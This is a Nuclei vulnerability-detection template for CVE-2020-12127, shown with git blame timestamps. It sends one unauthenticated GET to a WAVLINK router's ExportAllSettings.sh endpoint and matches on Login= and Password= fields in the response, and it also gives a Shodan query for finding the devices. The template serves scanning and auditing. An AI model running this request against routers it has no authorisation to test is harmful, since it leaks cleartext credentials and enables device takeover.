nuclei-templates/http/cves/2020/CVE-2020-12127.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-14 20:15:23 +00:00
id: CVE-2020-12127
info:
name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
author: arafatansari
severity: high
description: |
WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
2022-08-14 20:15:23 +00:00
reference:
- https://cerne.xyz/bugs/CVE-2020-12127
- https://www.wavlink.com/en_us/product/WL-WN530H4.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-12127
2022-08-15 05:57:19 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-15 05:57:19 +00:00
cve-id: CVE-2020-12127
cwe-id: CWE-306
epss-score: 0.0509
2022-08-14 20:15:23 +00:00
metadata:
max-request: 1
2022-08-14 20:15:23 +00:00
shodan-query: http.html:"Wavlink"
2023-06-04 08:13:42 +00:00
verified: true
2022-08-15 05:57:19 +00:00
tags: cve,cve2020,wavlink,exposure
2022-08-14 20:15:23 +00:00
http:
2022-08-15 05:57:19 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
2022-08-14 20:15:23 +00:00
matchers-condition: and
matchers:
2022-08-15 05:57:19 +00:00
- type: word
part: body
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
2022-08-14 20:15:23 +00:00
- type: status
status:
- 200
# Enhanced by md on 2023/02/01